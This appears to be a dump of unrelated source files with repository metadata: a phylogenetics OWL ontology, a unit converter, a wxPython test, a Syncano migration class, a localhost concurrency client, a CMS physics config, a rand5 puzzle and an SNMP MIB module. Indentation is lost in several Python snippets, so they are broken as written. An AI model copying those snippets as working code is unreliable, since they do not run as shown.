<rdfs:label rdf:datatype="&xsd;string">MolecularCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000111"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000116 -->
<owl:Class rdf:about="&obo;CDAO_0000116">
<rdfs:label rdf:datatype="&xsd;string">hereditaryPersistance</rdfs:label>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000190"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000097"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000117 -->
<owl:Class rdf:about="&obo;CDAO_0000117">
<rdfs:label rdf:datatype="&xsd;string">SetOfCharacters</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000118"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000118 -->
<owl:Class rdf:about="&obo;CDAO_0000118">
<rdfs:label rdf:datatype="&xsd;string">SetOfThings</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000198"/>
<owl:allValuesFrom>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000071"/>
<rdf:Description rdf:about="&obo;CDAO_0000117"/>
</owl:unionOf>
</owl:Class>
</owl:allValuesFrom>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>The class is used to describe either collections of characters or higher-order groupings (e.g., groups of groups of characters). This extends the CharSet block of NEXUS.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000120 -->
<owl:Class rdf:about="&obo;CDAO_0000120">
<rdfs:label rdf:datatype="&xsd;string">Sequence</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000098"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:allValuesFrom>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000151"/>
<owl:onClass rdf:resource="&obo;CDAO_0000022"/>
<owl:minQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:minQualifiedCardinality>
</owl:Restriction>
</owl:allValuesFrom>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>A set of ordered states, typically the residues in a macromolecular sequence.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000121 -->
<owl:Class rdf:about="&obo;CDAO_0000121">
<rdfs:label rdf:datatype="&xsd;string">speciation</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000122"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000064"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000122 -->
<owl:Class rdf:about="&obo;CDAO_0000122">
<rdfs:label rdf:datatype="&xsd;string">cladogenesis</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000064"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000124 -->
<owl:Class rdf:about="&obo;CDAO_0000124">
<rdfs:label rdf:datatype="&xsd;string">Bifurcation</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000026"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000177"/>
<owl:cardinality rdf:datatype="&xsd;nonNegativeInteger">2</owl:cardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000125 -->
<owl:Class rdf:about="&obo;CDAO_0000125">
<rdfs:label rdf:datatype="&xsd;string">DiscreteCharBayesianLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000100"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000126 -->
<owl:Class rdf:about="&obo;CDAO_0000126">
<rdfs:label rdf:datatype="&xsd;string">TaxonomicLink</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000066"/>
<dc:description>Link to an externally defined taxonomic hierarchy.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000127 -->
<owl:Class rdf:about="&obo;CDAO_0000127">
<rdfs:label rdf:datatype="&xsd;string">MonophyleticGroup</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000006"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000128 -->
<owl:Class rdf:about="&obo;CDAO_0000128">
<rdfs:label rdf:datatype="&xsd;string">molecularRecombination</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000132"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000129 -->
<owl:Class rdf:about="&obo;CDAO_0000129">
<rdfs:label rdf:datatype="&xsd;string">HolophyleticGroup</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000127"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000130 -->
<owl:Class rdf:about="&obo;CDAO_0000130">
<rdfs:label rdf:datatype="&xsd;string">FullyResolvedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000131 -->
<owl:Class rdf:about="&obo;CDAO_0000131">
<rdfs:label rdf:datatype="&xsd;string">AminoAcidResidueCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000115"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000168"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000112"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000112"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000132 -->
<owl:Class rdf:about="&obo;CDAO_0000132">
<rdfs:label rdf:datatype="&xsd;string">recombination</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000087"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000133 -->
<owl:Class rdf:about="&obo;CDAO_0000133">
<rdfs:label rdf:datatype="&xsd;string">DesoxiRibonucleotideResidue</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000034"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000134 -->
<owl:Class rdf:about="&obo;CDAO_0000134">
<rdfs:label rdf:datatype="&xsd;string">RootedSubtree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000012"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000070"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000136 -->
<owl:Class rdf:about="&obo;CDAO_0000136">
<rdfs:label rdf:datatype="&xsd;string">CompoundStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000089"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000137 -->
<owl:Class rdf:about="&obo;CDAO_0000137">
<rdfs:label rdf:datatype="&xsd;string">GapCost</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000007"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000138 -->
<owl:Class rdf:about="&obo;CDAO_0000138">
<rdfs:label rdf:datatype="&xsd;string">TU</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<dc:description>A unit of analysis that may be tied to a node in a tree and to a row in a character matrix. It subsumes the traditional concepts of 'OTU' and 'HTU'.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000139 -->
<owl:Class rdf:about="&obo;CDAO_0000139">
<rdfs:label rdf:datatype="&xsd;string">DirectedEdge</rdfs:label>
<owl:equivalentClass>
<owl:Class>
<owl:intersectionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000099"/>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000201"/>
<owl:onClass rdf:resource="&obo;CDAO_0000140"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000209"/>
<owl:onClass rdf:resource="&obo;CDAO_0000140"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</owl:intersectionOf>
</owl:Class>
</owl:equivalentClass>
<dc:description>A directed edge. Rooted trees have directed edges. The direction is specified by way of the parent and child relationships of nodes that the edge connects.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000140 -->
<owl:Class rdf:about="&obo;CDAO_0000140">
<rdfs:label rdf:datatype="&xsd;string">Node</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000143"/>
<owl:onClass rdf:resource="&obo;CDAO_0000139"/>
<owl:maxQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:maxQualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000194"/>
<owl:onClass rdf:resource="&obo;CDAO_0000006"/>
<owl:minQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:minQualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000141 -->
<owl:Class rdf:about="&obo;CDAO_0000141">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharDistanceLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000009"/>
</owl:Class>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// Individuals
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<!-- http://purl.obolibrary.org/obo/CDAO_0000220 -->
<owl:Thing rdf:about="&obo;CDAO_0000220">
<rdf:type rdf:resource="&obo;CDAO_0000133"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">dA</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000221 -->
<owl:Thing rdf:about="&obo;CDAO_0000221">
<rdf:type rdf:resource="&obo;CDAO_0000015"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">absent</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000222 -->
<owl:Thing rdf:about="&obo;CDAO_0000222">
<rdf:type rdf:resource="&obo;CDAO_0000015"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">unknown</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000223 -->
<owl:Thing rdf:about="&obo;CDAO_0000223">
<rdf:type rdf:resource="&obo;CDAO_0000015"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">gap</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000224 -->
<owl:Thing rdf:about="&obo;CDAO_0000224">
<rdf:type rdf:resource="&obo;CDAO_0000133"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">dG</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000225 -->
<owl:Thing rdf:about="&obo;CDAO_0000225">
<rdf:type rdf:resource="&obo;CDAO_0000057"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">rU</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000226 -->
<owl:Thing rdf:about="&obo;CDAO_0000226">
<rdf:type rdf:resource="&obo;CDAO_0000133"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">dC</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000227 -->
<owl:Thing rdf:about="&obo;CDAO_0000227">
<rdf:type rdf:resource="&obo;CDAO_0000133"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">dT</rdfs:label>
</owl:Thing>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// General axioms
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<rdf:Description>
<rdf:type rdf:resource="&owl;AllDisjointClasses"/>
<owl:members rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000068"/>
<rdf:Description rdf:about="&obo;CDAO_0000094"/>
<rdf:Description rdf:about="&obo;CDAO_0000131"/>
</owl:members>
</rdf:Description>
<rdf:Description>
<rdf:type rdf:resource="&owl;AllDisjointClasses"/>
<owl:members rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000002"/>
<rdf:Description rdf:about="&obo;CDAO_0000019"/>
<rdf:Description rdf:about="&obo;CDAO_0000112"/>
</owl:members>
</rdf:Description>
</rdf:RDF>
<!-- Generated by the OWL API (version 3.2.3.1824) http://owlapi.sourceforge.net -->
'''
cdao_elements = {}
root = ET.fromstring(cdao_owl)
for node_type in 'ObjectProperty', 'Class', 'DatatypeProperty':
for element in root.findall('{http://www.w3.org/2002/07/owl#}%s' % node_type):
obo = element.attrib[
'{http://www.w3.org/1999/02/22-rdf-syntax-ns#}about'].split('/')[-1]
cdao = element.find(
'{http://www.w3.org/2000/01/rdf-schema#}label').text
cdao_elements[cdao] = obo
# backup/user_320/ch10_2019_08_27_16_35_02_989821.py
def libras_para_kg(peso):
kg = float(peso) / 2.205
kg = round(kg, 7)
    return kg
# unittests/test_lib_stattext.py
import unittest
import wtc
import wx
import wx.lib.stattext
#---------------------------------------------------------------------------
class lib_stattext_Tests(wtc.WidgetTestCase):
def test_lib_stattext1(self):
pnl = wx.Panel(self.frame)
w = wx.lib.stattext.GenStaticText(pnl, label="This is a test", pos=(10,10))
bs1 = w.GetEffectiveMinSize()
w.SetLabel("This is a New Label")
w.SetFont(wx.FFont(16, wx.FONTFAMILY_ROMAN))
bs2 = w.GetEffectiveMinSize()
self.assertEqual(w.GetLabel(), "This is a New Label")
self.assertEqual(w.Label, "This is a New Label")
self.assertTrue(bs2.height > bs1.height)
#---------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
# syncano_cli/parse_to_syncano/migrations/relation.py (MIT license)
import six
from syncano.models import Object
from syncano_cli.parse_to_syncano.config import PARSE_PAGINATION_LIMIT
from syncano_cli.parse_to_syncano.migrations.aggregation import data_aggregate
from syncano_cli.parse_to_syncano.migrations.mixins import PaginationMixin, ParseConnectionMixin
from syncano_cli.parse_to_syncano.processors.klass import ClassProcessor
class ClassRelationProcessor(ParseConnectionMixin, PaginationMixin):
def __init__(self, class_name, relations, config):
self.class_name = class_name
self.relations = relations
self.reference_map = data_aggregate.reference_map
self.config = config
def process_class(self, instance):
for relation in self.relations:
for field_name, relation_meta in six.iteritems(relation):
target_name = relation_meta['targetClass']
self._find_and_update_relations_objects(
field_name=field_name,
target_name=target_name,
instance=instance
)
def _find_and_update_relations_objects(self, field_name, target_name, instance):
# get the parse classes now;
for parse_class_name, objects_id_map in six.iteritems(self.reference_map):
if self.class_name == ClassProcessor.normalize_class_name(parse_class_name):
for parse_id, syncano_id in six.iteritems(objects_id_map):
self._find_relations_for_object(
parse_class_name=parse_class_name,
target_name=target_name,
parse_id=parse_id,
syncano_id=syncano_id,
field_name=field_name,
instance=instance
)
def _find_relations_for_object(self, parse_class_name, target_name, parse_id, syncano_id, field_name, instance):
limit, skip = self.get_limit_and_skip()
while True:
objects = self._find_parse_objects(parse_class_name, parse_id, field_name,
target_name, limit, skip)
if not objects['results']:
break
limit += PARSE_PAGINATION_LIMIT
skip += PARSE_PAGINATION_LIMIT
self._update_syncano_object(
field_name=field_name,
target_name=target_name,
objects_results=objects['results'],
syncano_id=syncano_id,
instance=instance
)
def _find_parse_objects(self, parse_class_name, parse_id, field_name, target_name, limit, skip):
query = {
"$relatedTo": {
"object": {
"__type": "Pointer",
"className": parse_class_name,
"objectId": parse_id},
"key": field_name}
}
return self.parse.get_class_objects(target_name, limit=limit, skip=skip, query=query)
def _update_syncano_object(self, field_name, target_name, objects_results, syncano_id, instance):
Object.please.update(
**{
field_name: {
"_add": [
self.reference_map[target_name][
data_object['objectId']
] for data_object in objects_results]
},
"class_name": self.class_name,
"id": syncano_id,
"instance_name": instance.name
}
)
class RelationProcessor(object):
def __init__(self, class_name, class_relations, *args, **kwargs):
super(RelationProcessor, self).__init__(*args, **kwargs)
self.class_relations = class_relations
self.class_name = class_name
def process(self, instance, config):
class_relation_processor = ClassRelationProcessor(
class_name=self.class_name,
relations=self.class_relations,
config=config
)
class_relation_processor.process_class(instance)
| [
"opalczynski@gmail.com"
] | opalczynski@gmail.com |
4b53d1aff74b9ca1c7a958b676fafc0af6f30f2e | 8e0a7d3f10a10942158cf3f95fd2e81e92d37843 | /test_twisted_async_response/concurrent_client.py | c0b76423fc79be5e9f2a53fcc5f32786ca933f33 | [] | no_license | xsren/python_test_demo | 1d528cb8ebe017d962a2b155638e233c094b1e63 | d320276bc9f6fb80860d8db7fcd3f500865176b3 | refs/heads/master | 2020-12-30T17:50:43.830322 | 2017-08-01T03:35:45 | 2017-08-01T03:35:45 | 82,634,652 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 349 | py | # coding:utf8
import requests
import threading
def run():
print requests.get('http://127.0.0.1:1234/crawler')
def main():
t_list = []
for i in xrange(30):
t_list.append(threading.Thread(target=run, args=()))
for t in t_list:
t.start()
for t in t_list:
t.join()
if __name__ == '__main__':
main()
| [
"bestrenxs@gmail.com"
] | bestrenxs@gmail.com |
b311e6d7b6d1e81c08bb8cc84850ffd001b69295 | 2455062787d67535da8be051ac5e361a097cf66f | /Producers/BSUB/TrigProd_amumu_a5_dR5/trigger_amumu_producer_cfg_TrigProd_amumu_a5_dR5_372.py | 3fbb1b489f893e31fa92395685530a11c8ff0448 | [] | no_license | kmtos/BBA-RecoLevel | 6e153c08d5ef579a42800f6c11995ee55eb54846 | 367adaa745fbdb43e875e5ce837c613d288738ab | refs/heads/master | 2021-01-10T08:33:45.509687 | 2015-12-04T09:20:14 | 2015-12-04T09:20:14 | 43,355,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,360 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("PAT")
#process.load("BBA/Analyzer/bbaanalyzer_cfi")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load('Configuration.EventContent.EventContent_cff')
process.load("Configuration.Geometry.GeometryRecoDB_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("PhysicsTools.PatAlgos.producersLayer1.patCandidates_cff")
process.load("PhysicsTools.PatAlgos.selectionLayer1.selectedPatCandidates_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'MCRUN2_71_V1::All', '')
process.load("Configuration.StandardSequences.MagneticField_cff")
####################
# Message Logger
####################
process.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(100)
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
## switch to uncheduled mode
process.options.allowUnscheduled = cms.untracked.bool(True)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(500)
)
####################
# Input File List
####################
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('root://eoscms//eos/cms/store/user/ktos/RECO_Step3_amumu_a5/RECO_Step3_amumu_a5_372.root'),
secondaryFileNames = cms.untracked.vstring()
)
############################################################
# Defining matching in DeltaR, sorting by best DeltaR
############################################################
process.mOniaTrigMatch = cms.EDProducer("PATTriggerMatcherDRLessByR",
src = cms.InputTag( 'slimmedMuons' ),
matched = cms.InputTag( 'patTrigger' ), # selections of trigger objects
matchedCuts = cms.string( 'type( "TriggerMuon" ) && path( "HLT_Mu16_TkMu0_dEta18_Onia*")' ), # input does not yet have the 'saveTags' parameter in HLT
maxDPtRel = cms.double( 0.5 ), # no effect here
maxDeltaR = cms.double( 0.3 ), #### selection of matches
maxDeltaEta = cms.double( 0.2 ), # no effect here
resolveAmbiguities = cms.bool( True ),# definition of matcher output
resolveByMatchQuality = cms.bool( True )# definition of matcher output
)
# talk to output module
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string("file:RECO_Step3_amumu_a5_TrigProd_372.root"),
outputCommands = process.MINIAODSIMEventContent.outputCommands
)
process.out.outputCommands += [ 'drop *_*_*_*',
'keep *_*slimmed*_*_*',
'keep *_pfTausEI_*_*',
'keep *_hpsPFTauProducer_*_*',
'keep *_hltTriggerSummaryAOD_*_*',
'keep *_TriggerResults_*_HLT',
'keep *_patTrigger*_*_*',
'keep *_prunedGenParticles_*_*',
'keep *_mOniaTrigMatch_*_*'
]
################################################################################
# Running the matching and setting the the trigger on
################################################################################
from PhysicsTools.PatAlgos.tools.trigTools import *
switchOnTrigger( process ) # This is optional and can be omitted.
switchOnTriggerMatching( process, triggerMatchers = [ 'mOniaTrigMatch'
])
process.outpath = cms.EndPath(process.out)
| [
"kmtos@ucdavis.edu"
] | kmtos@ucdavis.edu |
82dac60d0ffe68054b0a7335cbf480b129ea8419 | 165a9d0db328e96d14ac7c3073205819768959e2 | /CDS_71_rand5_of_rand7.py | 4f2fde50f5a26969c74f7a83091584b94c28fade | [
"MIT"
] | permissive | celelstine/codingProblemSolutions | 12cef3396be96509bb37505fa357391537a8ad72 | 52e567aaa4a6e40c11bc131c2fdfffccfa7408b1 | refs/heads/master | 2021-06-05T21:15:29.772534 | 2020-02-23T18:19:29 | 2020-02-23T18:19:29 | 146,922,897 | 0 | 0 | MIT | 2018-10-01T05:32:59 | 2018-08-31T17:28:03 | JavaScript | UTF-8 | Python | false | false | 445 | py | import random
def rand7():
return random.randint(1,7)
def rand5():
problemDescription = '''
*problemDescription* \n
This problem was asked by Two Sigma.
Using a function rand7() that returns an integer from 1 to 7 (inclusive)
with uniform probability, implement a function rand5() that returns an
integer from 1 to 5 (inclusive).
'''
print(problemDescription)
    while True:
        roll = rand7()
        # keep only 1..5; re-roll on 6 and 7 so the result stays uniform
        if roll <= 5:
            return roll
print(rand5())
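One way to sanity-check any rand5 candidate is to tally a large sample; the sketch below re-implements the standard rejection trick locally (names `rand5_rejection` and `trials` are illustrative, not part of the module above):

```python
import random
from collections import Counter

def rand7():
    return random.randint(1, 7)

def rand5_rejection():
    # re-roll whenever rand7 lands on 6 or 7; the accepted
    # values 1..5 are then uniformly distributed
    while True:
        roll = rand7()
        if roll <= 5:
            return roll

trials = 50_000
counts = Counter(rand5_rejection() for _ in range(trials))
print(sorted(counts))  # [1, 2, 3, 4, 5]
```

With 50,000 draws each value should land near 10,000 hits; large deviations would indicate a biased construction.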
| [
"okorocelestine@gmail.com"
] | okorocelestine@gmail.com |
41ea32d94d3a6051a0d9da368d6845f1dd0bca17 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp/ChrComPmOpticsOMS-SRC-Interval-MIB.py | 5402d87dcd40317e45e7a4f24fc7e5a0faecf34e | [
"Apache-2.0"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 5,733 | py | #
# PySNMP MIB module ChrComPmOpticsOMS-SRC-Interval-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ChrComPmOpticsOMS-SRC-Interval-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 18:20:16 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
chrComIfifIndex, = mibBuilder.importSymbols("ChrComIfifTable-MIB", "chrComIfifIndex")
TruthValue, = mibBuilder.importSymbols("ChrTyp-MIB", "TruthValue")
chrComPmOptics, = mibBuilder.importSymbols("Chromatis-MIB", "chrComPmOptics")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
IpAddress, NotificationType, Unsigned32, MibIdentifier, ObjectIdentity, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, TimeTicks, Bits, Counter32, iso, ModuleIdentity, Counter64 = mibBuilder.importSymbols("SNMPv2-SMI", "IpAddress", "NotificationType", "Unsigned32", "MibIdentifier", "ObjectIdentity", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "TimeTicks", "Bits", "Counter32", "iso", "ModuleIdentity", "Counter64")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
chrComPmOpticsOMS_SRC_IntervalTable = MibTable((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11), ).setLabel("chrComPmOpticsOMS-SRC-IntervalTable")
if mibBuilder.loadTexts: chrComPmOpticsOMS_SRC_IntervalTable.setStatus('current')
chrComPmOpticsOMS_SRC_IntervalEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1), ).setLabel("chrComPmOpticsOMS-SRC-IntervalEntry").setIndexNames((0, "ChrComIfifTable-MIB", "chrComIfifIndex"), (0, "ChrComPmOpticsOMS-SRC-Interval-MIB", "chrComPmOpticsIntervalNumber"))
if mibBuilder.loadTexts: chrComPmOpticsOMS_SRC_IntervalEntry.setStatus('current')
chrComPmOpticsIntervalNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsIntervalNumber.setStatus('current')
chrComPmOpticsSuspectedIntrvl = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsSuspectedIntrvl.setStatus('current')
chrComPmOpticsElapsedTime = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsElapsedTime.setStatus('current')
chrComPmOpticsSuppressedIntrvls = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 4), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsSuppressedIntrvls.setStatus('current')
chrComPmOpticsORS = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 5), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsORS.setStatus('current')
chrComPmOpticsSES = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 6), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsSES.setStatus('current')
chrComPmOpticsUAS = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 7), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsUAS.setStatus('current')
chrComPmOpticsMean = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsMean.setStatus('current')
chrComPmOpticsMax = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsMax.setStatus('current')
